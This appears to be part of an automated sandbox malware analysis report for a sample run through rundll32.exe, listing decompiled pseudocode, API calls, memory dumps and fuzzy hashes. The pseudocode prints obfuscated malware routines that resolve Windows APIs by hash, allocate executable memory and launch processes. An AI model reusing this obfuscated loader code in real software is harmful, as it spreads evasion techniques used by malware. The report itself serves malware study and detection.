				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E00292550(_t49);
				_v12 = 0xd1fa;
				_t60 = 0x3c;
				_v12 = _v12 / _t60;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 ^ 0x00001682;
				_v20 = 0xd4c2;
				_v20 = _v20 + 0x3986;
				_v20 = _v20 ^ 0x00013905;
				_v8 = 0x8c53;
				_v8 = _v8 >> 4;
				_v8 = _v8 << 1;
				_v8 = _v8 ^ 0x000060d6;
				_v16 = 0x467b;
				_v16 = _v16 + 0xffff2b71;
				_v16 = _v16 ^ 0xffff105c;
				E00287378(_t60, 0x8aa9db76, _t60, 0x90f109b3, 0x100);
				_t58 = CreateProcessW(_a52, _a24, 0, 0, _t65, 0, 0, 0, _a60, _a40); // executed
				return _t58;
			}

0x0029b876
0x0029b87b
0x0029b87d
0x0029b87e
0x0029b881
0x0029b884
0x0029b887
0x0029b88a
0x0029b88d
0x0029b890
0x0029b891
0x0029b892
0x0029b893
0x0029b896
0x0029b897
0x0029b89a
0x0029b89d
0x0029b8a0
0x0029b8a4
0x0029b8a5
0x0029b8aa
0x0029b8bb
0x0029b8c3
0x0029b8c6
0x0029b8ca
0x0029b8d1
0x0029b8d8
0x0029b8df
0x0029b8e6
0x0029b8ed
0x0029b8f1
0x0029b8f4
0x0029b8fb
0x0029b902
0x0029b909
0x0029b928
0x0029b942
0x0029b949

APIs

CreateProcessW.KERNEL32(?,?,00000000,00000000,?,00000000,00000000,00000000,?,?), ref: 0029B942

Memory Dump Source

Source File: 00000009.00000002.2335393724.0000000000280000.00000040.00020000.sdmp, Offset: 00280000, based on PE: true

Associated: 00000009.00000002.2335415842.00000000002A0000.00000040.00020000.sdmp Download File
Associated: 00000009.00000002.2335421471.00000000002A2000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_280000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 0c2a7e7f22d8817370b5b33d85e2b014bcdf9d8a6a03b3886b5f04f00f255257
Instruction ID: e088f2b9e1c284fb2eb4a5ae170056dce18bcb9d08569c27f641654928314334
Opcode Fuzzy Hash: 0c2a7e7f22d8817370b5b33d85e2b014bcdf9d8a6a03b3886b5f04f00f255257
Instruction Fuzzy Hash: 3C21D372800248BBDF159F95CC09CDFBFB9FB89714F408158FA1466260D7B69A60DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0028471A, Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E0028471A(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t50;
				intOrPtr* _t61;
				void* _t62;
				signed int _t63;
				signed int _t64;

				E00292550(_t50);
				_v20 = 0xf336;
				_v20 = _v20 + 0x29f7;
				_v20 = _v20 ^ 0x000152a0;
				_v8 = 0xc9c4;
				_v8 = _v8 >> 0x10;
				_v8 = _v8 << 3;
				_t63 = 0x6d;
				_v8 = _v8 * 0x43;
				_v8 = _v8 ^ 0x0000467c;
				_v16 = 0x763b;
				_t64 = 0x2d;
				_v16 = _v16 / _t63;
				_v16 = _v16 << 4;
				_v16 = _v16 ^ 0x000058e5;
				_v12 = 0x527e;
				_v12 = _v12 / _t64;
				_v12 = _v12 | 0xd776a7a3;
				_v12 = _v12 ^ 0xd776f938;
				_t61 = E00287378(_t64, 0x23d331d1, _t64, 0xd20b8aa4, 0x174);
				_t62 =  *_t61(0, _a4, 0, 0, _a8, 0, 0, _a4, _a8, _a12, _a16, _a20, _a24, _a28, 0); // executed
				return _t62;
			}

0x0028473b
0x00284740
0x0028474a
0x00284753
0x0028475a
0x00284761
0x00284765
0x0028476f
0x00284772
0x00284775
0x0028477c
0x00284788
0x00284789
0x0028478e
0x00284792
0x00284799
0x002847aa
0x002847ad
0x002847b4
0x002847d3
0x002847e4
0x002847ea

APIs

SHGetFolderPathW.SHELL32(00000000,D776F938,00000000,00000000,000058E5), ref: 002847E4

Memory Dump Source

Source File: 00000009.00000002.2335393724.0000000000280000.00000040.00020000.sdmp, Offset: 00280000, based on PE: true

Associated: 00000009.00000002.2335415842.00000000002A0000.00000040.00020000.sdmp Download File
Associated: 00000009.00000002.2335421471.00000000002A2000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_280000_rundll32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: 0a1e481ed0b4bb684b4a4fbdce82325e9ffb300045724f91d1da592bf306b1e2
Instruction ID: a313bf79f98dc62d4da0af9c3df1d55046c992b10d21a1929ed919748a23d67c
Opcode Fuzzy Hash: 0a1e481ed0b4bb684b4a4fbdce82325e9ffb300045724f91d1da592bf306b1e2
Instruction Fuzzy Hash: EF210372D01208FBEF05DFE4C84A8DEBBB5EF05354F108089E924A6250D3B59B20DF90

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 002A8330, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 68COMMON

Download Yara Rule

APIs

GetMonitorInfoA.USER32(?,?), ref: 002A8361
GetSystemMetrics.USER32(00000000), ref: 002A839D
GetSystemMetrics.USER32(00000001), ref: 002A83A8

Strings

DISPLAY, xrefs: 002A83C9
/}Au, xrefs: 002A839D, 002A83A8
GetMonitorInfo, xrefs: 002A8348

Memory Dump Source

Source File: 00000009.00000002.2335427349.00000000002A3000.00000020.00020000.sdmp, Offset: 002A3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2a3000_rundll32.jbxd

Similarity

API ID: MetricsSystem$InfoMonitor
String ID: /}Au$DISPLAY$GetMonitorInfo
API String ID: 4250584380-1428758730
Opcode ID: fb8d8bb3fb056446f36ae3173238a8ddf0b88d2f8b87f3c3991b40f8945d92fe
Instruction ID: a56700dd64d6ac11fc37c7e67ba6455f141a592f61c04349ec00ccf11b74174c
Opcode Fuzzy Hash: fb8d8bb3fb056446f36ae3173238a8ddf0b88d2f8b87f3c3991b40f8945d92fe
Instruction Fuzzy Hash: A11129316513059FDB20CF20AC88BB7B7E8EB06B50F004929FD46DB241EFB0A814CB90

Uniqueness

Uniqueness Score: -1.00%

Function 002A85AC, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 109COMMON

Download Yara Rule

APIs

EnumDisplayMonitors.USER32(?,?,?,?), ref: 002A85E5
GetSystemMetrics.USER32(00000000), ref: 002A860A
GetSystemMetrics.USER32(00000001), ref: 002A8615

Strings

EnumDisplayMonitors, xrefs: 002A85C4
/}Au, xrefs: 002A860A, 002A8615

Memory Dump Source

Source File: 00000009.00000002.2335427349.00000000002A3000.00000020.00020000.sdmp, Offset: 002A3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2a3000_rundll32.jbxd

Similarity

API ID: MetricsSystem$DisplayEnumMonitors
String ID: /}Au$EnumDisplayMonitors
API String ID: 1389147845-1105134141
Opcode ID: 7c74f0b42cfe89c72f0bbaea025c93e1ba7f29d653b092523e1219eee4319ba8
Instruction ID: 3553bd3f4e43154c843d10a67df427e0afb007fdc7bfba76bc7bbbe85e7e16c2
Opcode Fuzzy Hash: 7c74f0b42cfe89c72f0bbaea025c93e1ba7f29d653b092523e1219eee4319ba8
Instruction Fuzzy Hash: EF315EB291120AAFDB10DFA4DC88AEFB7BCAB16700F004526E915D7241EF34D9248BA0

Uniqueness

Uniqueness Score: -1.00%

Function 002A8404, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 002A8471
GetSystemMetrics.USER32(00000001), ref: 002A847C

Strings

DISPLAY, xrefs: 002A849D
/}Au, xrefs: 002A8471, 002A847C
GetMonitorInfoA, xrefs: 002A841C

Memory Dump Source

Source File: 00000009.00000002.2335427349.00000000002A3000.00000020.00020000.sdmp, Offset: 002A3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2a3000_rundll32.jbxd

Similarity

API ID: MetricsSystem
String ID: /}Au$DISPLAY$GetMonitorInfoA
API String ID: 4116985748-2822609925
Opcode ID: 8e51eed75cdfc362c48d428d85dc6f3e7e7899bdc4078ecdf372f5f09ca67091
Instruction ID: 3d028dc87c8a1ba1d23302151e9a1e0c98b0487495ddeea837b97de823ca485a
Opcode Fuzzy Hash: 8e51eed75cdfc362c48d428d85dc6f3e7e7899bdc4078ecdf372f5f09ca67091
Instruction Fuzzy Hash: 391126316617069FD720DF60EC8CBA7BBE8EB0A360F004429ED458F241DFB0A8548BA0

Uniqueness

Uniqueness Score: -1.00%

Function 002A84D8, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 002A8545
GetSystemMetrics.USER32(00000001), ref: 002A8550

Strings

DISPLAY, xrefs: 002A8571
/}Au, xrefs: 002A8545, 002A8550
GetMonitorInfoW, xrefs: 002A84F0

Memory Dump Source

Source File: 00000009.00000002.2335427349.00000000002A3000.00000020.00020000.sdmp, Offset: 002A3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2a3000_rundll32.jbxd

Similarity

API ID: MetricsSystem
String ID: /}Au$DISPLAY$GetMonitorInfoW
API String ID: 4116985748-1558784340
Opcode ID: 578b025a2c1566742f4f8851de51db141a10d61a3a99c9f87340d3dfadad22c4
Instruction ID: 709b0d5d472a71e0256a837cdfdaeee2af6739ecc0c84024d267de57ab4b3eb0
Opcode Fuzzy Hash: 578b025a2c1566742f4f8851de51db141a10d61a3a99c9f87340d3dfadad22c4
Instruction Fuzzy Hash: 46110031E613059FD760DF60AC88BA7B7E8EB16350F45452AED49CB281DFB0A8148BA0

Uniqueness

Uniqueness Score: -1.00%

Function 002A8298, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 002A82E6
GetSystemMetrics.USER32(00000001), ref: 002A82F8

Strings

MonitorFromPoint, xrefs: 002A82AA
/}Au, xrefs: 002A82E6, 002A82F8

Memory Dump Source

Source File: 00000009.00000002.2335427349.00000000002A3000.00000020.00020000.sdmp, Offset: 002A3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2a3000_rundll32.jbxd

Similarity

API ID: MetricsSystem
String ID: /}Au$MonitorFromPoint
API String ID: 4116985748-3670600901
Opcode ID: 153faa2a35762cf4d69d8cb7afd4f461b938a782da3f56c11edd7d50e4ce1ef6
Instruction ID: 7528fd5deafc572e54c8131f37d63827b3c795658911e3a20eb63c7732af2e08
Opcode Fuzzy Hash: 153faa2a35762cf4d69d8cb7afd4f461b938a782da3f56c11edd7d50e4ce1ef6
Instruction Fuzzy Hash: 4901D631A51349AFDF108F51EC8CB9E7B65EB62B90F044065F9048F112CFB0AD748BA0

Uniqueness

Uniqueness Score: -1.00%

Function 002A8170, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 002A81C1
GetSystemMetrics.USER32(00000001), ref: 002A81CD

Strings

/}Au, xrefs: 002A81C1, 002A81CD
MonitorFromRect, xrefs: 002A8185

Memory Dump Source

Source File: 00000009.00000002.2335427349.00000000002A3000.00000020.00020000.sdmp, Offset: 002A3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2a3000_rundll32.jbxd

Similarity

API ID: MetricsSystem
String ID: /}Au$MonitorFromRect
API String ID: 4116985748-120404372
Opcode ID: de4004b311924c18a13586b73ada0f25eafd65aeb978a737673534fab7fb5943
Instruction ID: 8c5bcc2ddffd73123e765587f012ff3ba0b83e174dc6b3c4add8bab8e32937af
Opcode Fuzzy Hash: de4004b311924c18a13586b73ada0f25eafd65aeb978a737673534fab7fb5943
Instruction Fuzzy Hash: D3014B3165035A9FD7209F15EC8DB57BBA9E752391F148462ED08CA202DE719C668BB0

Uniqueness

Uniqueness Score: -1.00%

Function 002E2B38, Relevance: 6.1, APIs: 4, Instructions: 61COMMON

Download Yara Rule

APIs

DdeCreateStringHandleA.USER32(00000015,00000000), ref: 002E2B7C
DdeClientTransaction.USER32(00000000,000000FF,00000000,?,?,00001034,000003E8,?), ref: 002E2BA9
DdeGetLastError.USER32(00000015), ref: 002E2BBB
DdeFreeStringHandle.USER32(00000015,?), ref: 002E2BCD

Memory Dump Source

Source File: 00000009.00000002.2335427349.00000000002A3000.00000020.00020000.sdmp, Offset: 002A3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2a3000_rundll32.jbxd

Similarity

API ID: HandleString$ClientCreateErrorFreeLastTransaction
String ID:
API String ID: 2421758087-0
Opcode ID: 16ea14fb4d981cbafc3c5bd8acd16d124b58f30e5e80647fa54f04f10902993b
Instruction ID: bdeb768019212b18d0e1305054350bbf50c3fc8cc41367e8f4af137910f43e4d
Opcode Fuzzy Hash: 16ea14fb4d981cbafc3c5bd8acd16d124b58f30e5e80647fa54f04f10902993b
Instruction Fuzzy Hash: 1B2124742542809FDB40EF69C8C5F6AB7E8AB49710F548195F988CF2A6D771E890CB60

Uniqueness

Uniqueness Score: -1.00%

Function 002E1428, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 169COMMON

Download Yara Rule

APIs

DdeQueryConvInfo.USER32(?,?,00000060), ref: 002E14BF

Strings

0., xrefs: 002E1607
`, xrefs: 002E1498

Memory Dump Source

Source File: 00000009.00000002.2335427349.00000000002A3000.00000020.00020000.sdmp, Offset: 002A3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2a3000_rundll32.jbxd

Similarity

API ID: ConvInfoQuery
String ID: 0.$`
API String ID: 701148680-2251769067
Opcode ID: 539383ce4d356be8f69774817d8d9ecd93f23669cb5fbfc1f3d58dfa5e1c0e71
Instruction ID: c50a18fda6fac33bd4947082407b02d73fd6f95018f5667c107584d95cbe316a
Opcode Fuzzy Hash: 539383ce4d356be8f69774817d8d9ecd93f23669cb5fbfc1f3d58dfa5e1c0e71
Instruction Fuzzy Hash: AB516576A6029A8BCB14DE5AD9895AE73BDFB48350F944030FD0AD7344CA30DD35CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 002A80E8, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(?), ref: 002A8110

Strings

/}Au, xrefs: 002A80FD, 002A810A, 002A8110
GetSystemMetrics, xrefs: 002A80F8

Memory Dump Source

Source File: 00000009.00000002.2335427349.00000000002A3000.00000020.00020000.sdmp, Offset: 002A3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2a3000_rundll32.jbxd

Similarity

API ID: MetricsSystem
String ID: /}Au$GetSystemMetrics
API String ID: 4116985748-3773086709
Opcode ID: 2299253467d4a7955f79c206fe3019f688879e4e58829cbbedb23ba8142dfda9
Instruction ID: 59fb01f8c9e4b3ac331972943f16df320bb61b9daf1e976e12c888a9b9c367c6
Opcode Fuzzy Hash: 2299253467d4a7955f79c206fe3019f688879e4e58829cbbedb23ba8142dfda9
Instruction Fuzzy Hash: 01F090B06352864FDB549B34ADCC722358AE753370F644A21E12E4A2D6CE7988668694

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 2184 Parent PID: 2960 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	4.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	269
Total number of Limit Nodes:	14

Executed Functions

Function 00313928, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 136
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetEnhMetaFileA.GDI32(trty55345), ref: 003139C2
VirtualAlloc.KERNELBASE(00000000,00316CB4,00001000,00000040), ref: 00313A8E

Strings

|l1, xrefs: 00313961
trty55345, xrefs: 003139BD

Memory Dump Source

Source File: 0000000A.00000002.2338400539.00000000002D3000.00000020.00020000.sdmp, Offset: 002D3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2d3000_rundll32.jbxd

Similarity

API ID: AllocFileMetaVirtual
String ID: trty55345$|l1
API String ID: 2643768156-3588773906
Opcode ID: ab55bd5cc37319accd0a9da3001af24695f8df652a8680aab4e1a29fa95d5544
Instruction ID: 2bc0b2330ad635e0f4f6f2d8b7b3490b87bb78c2affb66f63c8fba3a17749e34
Opcode Fuzzy Hash: ab55bd5cc37319accd0a9da3001af24695f8df652a8680aab4e1a29fa95d5544
Instruction Fuzzy Hash: F961AA706562009FD746DFA8ED87ADA77A9F70C384F01D029E1898B261EF75A894CF84

Uniqueness

Uniqueness Score: -1.00%

Function 002C04C7, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E002C04C7() {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _t48;
				signed int _t49;

				_v8 = 0xb3b9;
				_v8 = _v8 + 0x1dd8;
				_v8 = _v8 >> 0xa;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x000002ef;
				_v20 = 0x5082;
				_t48 = 0xc;
				_v20 = _v20 / _t48;
				_v20 = _v20 ^ 0x00006c35;
				_v12 = 0x710;
				_v12 = _v12 >> 3;
				_t49 = 0x6d;
				_v12 = _v12 / _t49;
				_v12 = _v12 ^ 0x0000532a;
				_v16 = 0x5a4c;
				_v16 = _v16 ^ 0xca4a1f4d;
				_v16 = _v16 ^ 0xca4a24cd;
				E002B7378(_t49, 0xbe36c403, _t49, 0x90f109b3, 0x2de);
				ExitProcess(0);
			}

0x002c04cd
0x002c04d6
0x002c04dd
0x002c04e1
0x002c04e5
0x002c04ec
0x002c04f8
0x002c04fd
0x002c0502
0x002c0509
0x002c0510
0x002c0517
0x002c051f
0x002c0522
0x002c0529
0x002c0530
0x002c0537
0x002c0556
0x002c0560

APIs

ExitProcess.KERNEL32(00000000), ref: 002C0560

Strings

LZ, xrefs: 002C0529
5l, xrefs: 002C0502
*S, xrefs: 002C0522

Memory Dump Source

Source File: 0000000A.00000002.2338282736.00000000002B0000.00000040.00020000.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000000A.00000002.2338372991.00000000002D0000.00000040.00020000.sdmp Download File
Associated: 0000000A.00000002.2338390519.00000000002D2000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b0000_rundll32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID: *S$5l$LZ
API String ID: 621844428-1939029103
Opcode ID: 1f04293e4df0c36aeb8e1b786eb226675117cff09b963e674629fc10ae944d0b
Instruction ID: 93258e66192656cbaec5ade77688f437fdc358ebf25b4e05fceb489cee75edea
Opcode Fuzzy Hash: 1f04293e4df0c36aeb8e1b786eb226675117cff09b963e674629fc10ae944d0b
Instruction Fuzzy Hash: 6811F771E0520CEBEB04DFE4D84AADEBBB1EB50714F10C189E414A7284D7F96B548F41

Uniqueness

Uniqueness Score: -1.00%

Function 002B9B5E, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 72
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 72%

			E002B9B5E(void* __ecx, long __edx, long _a4, void* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _v32;
				intOrPtr _v36;
				void* _t52;
				void* _t68;
				signed int _t70;
				signed int _t71;
				signed int _t72;
				long _t81;

				_push(_a12);
				_t81 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E002C2550(_t52);
				_v36 = 0x84647;
				asm("stosd");
				asm("stosd");
				_t70 = 0x14;
				asm("stosd");
				_v20 = 0xbd42;
				_t71 = 0x62;
				_v20 = _v20 / _t70;
				_v20 = _v20 ^ 0x00000265;
				_v16 = 0x7dd6;
				_v16 = _v16 / _t71;
				_v16 = _v16 ^ 0x742f5ff0;
				_v16 = _v16 ^ 0x742f2524;
				_v12 = 0x61c8;
				_t72 = 0x48;
				_v12 = _v12 / _t72;
				_v12 = _v12 + 0xffff34fc;
				_v12 = _v12 ^ 0xffff6696;
				_v8 = 0xb2ad;
				_v8 = _v8 * 0x5f;
				_v8 = _v8 * 0xd;
				_v8 = _v8 | 0x4443bccc;
				_v8 = _v8 ^ 0x475ff878;
				E002B7378(_t72, 0xa835739b, _t72, 0x90f109b3, 0x146);
				_t68 = RtlAllocateHeap(_a8, _a4, _t81); // executed
				return _t68;
			}

0x002b9b66
0x002b9b69
0x002b9b6b
0x002b9b6e
0x002b9b71
0x002b9b73
0x002b9b78
0x002b9b87
0x002b9b8c
0x002b9b8d
0x002b9b90
0x002b9b91
0x002b9b9d
0x002b9b9e
0x002b9ba3
0x002b9baa
0x002b9bb8
0x002b9bbd
0x002b9bc4
0x002b9bcb
0x002b9bd5
0x002b9bdd
0x002b9be0
0x002b9be7
0x002b9bee
0x002b9c05
0x002b9c0c
0x002b9c0f
0x002b9c16
0x002b9c29
0x002b9c38
0x002b9c3f

APIs

RtlAllocateHeap.NTDLL(742F2524,FFFF6696,?,?,?,?,?,?,?,?,?,00000000), ref: 002B9C38

Strings

$%/t, xrefs: 002B9BC4

Memory Dump Source

Source File: 0000000A.00000002.2338282736.00000000002B0000.00000040.00020000.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000000A.00000002.2338372991.00000000002D0000.00000040.00020000.sdmp Download File
Associated: 0000000A.00000002.2338390519.00000000002D2000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b0000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: $%/t
API String ID: 1279760036-1978068534
Opcode ID: e4494530c7293606e0a462107f0355474be5cf6c20967cc5bfbd89f70f117b7f
Instruction ID: b1edbd6708e89b924834ea91c91658aaa7b67dba62a9f748dc701cc16fcc6b51
Opcode Fuzzy Hash: e4494530c7293606e0a462107f0355474be5cf6c20967cc5bfbd89f70f117b7f
Instruction Fuzzy Hash: 1F214671D00209FBEB18CFA9C9469DEBBB5FB44310F508199E814AA2A0D7B99B109F51

Uniqueness

Uniqueness Score: -1.00%

Function 002CC0C8, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 53%

			E002CC0C8(long __ecx, long __edx, intOrPtr _a4, WCHAR* _a8, intOrPtr _a12, intOrPtr _a16, long _a20, intOrPtr _a24, long _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				void* _t40;
				void* _t48;
				long _t52;
				long _t53;

				_t52 = __edx;
				_push(0);
				_push(_a36);
				_t53 = __ecx;
				_push(_a32);
				_push(0);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E002C2550(_t40);
				_v20 = 0xb477;
				_v20 = _v20 >> 0x10;
				_v20 = _v20 ^ 0x000000e5;
				_v16 = 0xb312;
				_v16 = _v16 + 0x2a6f;
				_v16 = _v16 ^ 0x0000d90b;
				_v12 = 0x5a0b;
				_v12 = _v12 + 0x400b;
				_v12 = _v12 << 0xc;
				_v12 = _v12 ^ 0x09a119a3;
				_v8 = 0x3388;
				_v8 = _v8 + 0x85f8;
				_v8 = _v8 * 0x5a;
				_v8 = _v8 ^ 0x00415e39;
				E002B7378(__ecx, 0x81a8678d, __ecx, 0x90f109b3, 0x2bf);
				_t48 = CreateFileW(_a8, _t52, _t53, 0, _a32, _a20, 0); // executed
				return _t48;
			}

0x002cc0d3
0x002cc0d5
0x002cc0d6
0x002cc0d9
0x002cc0db
0x002cc0de
0x002cc0df
0x002cc0e2
0x002cc0e5
0x002cc0e8
0x002cc0eb
0x002cc0ee
0x002cc0f1
0x002cc0f2
0x002cc0f3
0x002cc0f8
0x002cc102
0x002cc106
0x002cc10d
0x002cc114
0x002cc11b
0x002cc122
0x002cc129
0x002cc130
0x002cc134
0x002cc13b
0x002cc142
0x002cc15d
0x002cc160
0x002cc174
0x002cc189
0x002cc191

APIs

CreateFileW.KERNEL32(0000D90B,?,D583BA2A,00000000,?,0ACC4A3C,00000000), ref: 002CC189

Strings

9^A, xrefs: 002CC160

Memory Dump Source

Source File: 0000000A.00000002.2338282736.00000000002B0000.00000040.00020000.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000000A.00000002.2338372991.00000000002D0000.00000040.00020000.sdmp Download File
Associated: 0000000A.00000002.2338390519.00000000002D2000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b0000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: 9^A
API String ID: 823142352-4044883665
Opcode ID: 6b5ee137b9331e853cde0f1d047c810309658232d35a9beccd783d46722f351c
Instruction ID: b0d29da812123f3db57adcd633a07c1e992cfbabcedfb34f198963e008ca67e2
Opcode Fuzzy Hash: 6b5ee137b9331e853cde0f1d047c810309658232d35a9beccd783d46722f351c
Instruction Fuzzy Hash: 4121CFB290020CBFEF019F95DD498DEBBB9EB55358F108198FA2462250D7B69E249B90

Uniqueness

Uniqueness Score: -1.00%

Function 00311638, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DdeInitializeA.USER32(00000044,Function_0003E428,00000000,00000000), ref: 00311686

Strings

Link, xrefs: 00311666

Memory Dump Source

Source File: 0000000A.00000002.2338400539.00000000002D3000.00000020.00020000.sdmp, Offset: 002D3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2d3000_rundll32.jbxd

Similarity

API ID: Initialize
String ID: Link
API String ID: 2538663250-2526951119
Opcode ID: 5530cb6c8cdbf04f8f4c8045878b82faa931d36e56e8d1cb96728a884c3437f1
Instruction ID: 24b21ee84695f9acd70e6616b25f7fd49ae3d668b86eb8dd66948cd13807de53
Opcode Fuzzy Hash: 5530cb6c8cdbf04f8f4c8045878b82faa931d36e56e8d1cb96728a884c3437f1
Instruction Fuzzy Hash: 2911E370610740AFC32AEB75DD82ACE77E4EF09740F801824F900DBA51EA32B9508B40

Uniqueness

Uniqueness Score: -1.00%

Function 001FEB40, Relevance: 3.3, APIs: 2, Instructions: 252
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 001FEB8F
VirtualProtect.KERNELBASE(?,?,00000000), ref: 001FEDD9

Memory Dump Source

Source File: 0000000A.00000002.2338123179.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
Instruction ID: 97a10145540773341ebc5178c26d946eefb5364c4a7d306cd2560212974939de
Opcode Fuzzy Hash: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
Instruction Fuzzy Hash: B2C189B5A00209DFCB48CF98C590EAEB7B6BF88314F148159E919AB355D735EE42CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00311A14, Relevance: 3.1, APIs: 2, Instructions: 56serviceCOMMON

Download Yara Rule

APIs

Part of subcall function 00311AC8: DdeFreeStringHandle.USER32(?,?), ref: 00311AE8

DdeCreateStringHandleA.USER32(?,00000000), ref: 00311A82
DdeNameService.USER32(?,00000000,00000000,00000001), ref: 00311A95

Memory Dump Source

Source File: 0000000A.00000002.2338400539.00000000002D3000.00000020.00020000.sdmp, Offset: 002D3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2d3000_rundll32.jbxd

Similarity

API ID: HandleString$CreateFreeNameService
String ID:
API String ID: 374373348-0
Opcode ID: 47febf70be0008a52d51ef2941d7125767c8af3fd5551c33524edcca1cbac309
Instruction ID: 887dbebf06ded2244a08cd18e67435f5017ac183c60c35be612007f09df6beaf
Opcode Fuzzy Hash: 47febf70be0008a52d51ef2941d7125767c8af3fd5551c33524edcca1cbac309
Instruction Fuzzy Hash: DF1182317212145FCB1AFAA8C8C2ACA3BACEF09B40B410560FD009B247DA70ED508B94

Uniqueness

Uniqueness Score: -1.00%

Function 002B7F4B, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 47
stringCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E002B7F4B(WCHAR* __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t35;
				int _t43;
				WCHAR* _t46;

				_push(_a12);
				_t46 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E002C2550(_t35);
				_v24 = _v24 & 0x00000000;
				_v32 = 0x71485a;
				_v28 = 0x57c810;
				_v20 = 0x2813;
				_v20 = _v20 * 0x59;
				_v20 = _v20 ^ 0x000dd428;
				_v16 = 0xdb84;
